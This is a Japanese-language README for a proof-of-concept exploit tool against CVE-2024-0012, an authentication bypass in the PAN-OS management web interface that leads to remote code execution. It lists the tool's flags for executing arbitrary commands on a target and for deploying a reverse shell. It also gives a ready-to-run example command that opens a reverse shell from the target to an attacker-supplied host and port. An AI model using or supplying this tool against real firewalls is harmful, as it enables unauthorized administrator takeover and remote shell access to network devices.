
CVE-2024-0012 PAN-OS: 管理Webインターフェースの認証バイパス (PAN-SA-2024-0015) RCE POC
CVE-2024-0012 は、Palo Alto Networks PAN-OS ソフトウェアにおける認証バイパスの脆弱性であり、管理用 Web インターフェースにネットワークアクセス可能な未認証の攻撃者が PAN-OS 管理者権限を取得し、管理操作の実行、設定の改ざん、または他の特権昇格の脆弱性を悪用することを可能にします。

| ❗ 免責事項 |
|---|
| このプロジェクトは、主にスタンドアロンの CLI ツールとして使用するために構築されています。このエクスプロイトをサービスとして実行すると、セキュリティリスクが生じる可能性があります。 注意して使用し、追加のセキュリティ対策を講じることを推奨します。DWYOR |
python3 cve-2024-0012.py -h
これにより、ツールのヘルプが表示されます。以下はサポートされているすべてのスイッチです。
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help show this help message and exit
--url URL Target base URL (http:// or https://)
--no-verify Disable SSL verification
--timeout TIMEOUT Request timeout in seconds
--command COMMAND Command to execute on the target
--reverse-shell Deploy a reverse shell to the target
--lhost LHOST Local host for reverse shell connection (required for reverse shell)
--lport LPORT Local port for reverse shell connection (required for reverse shell)
リバースシェルコマンド。
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444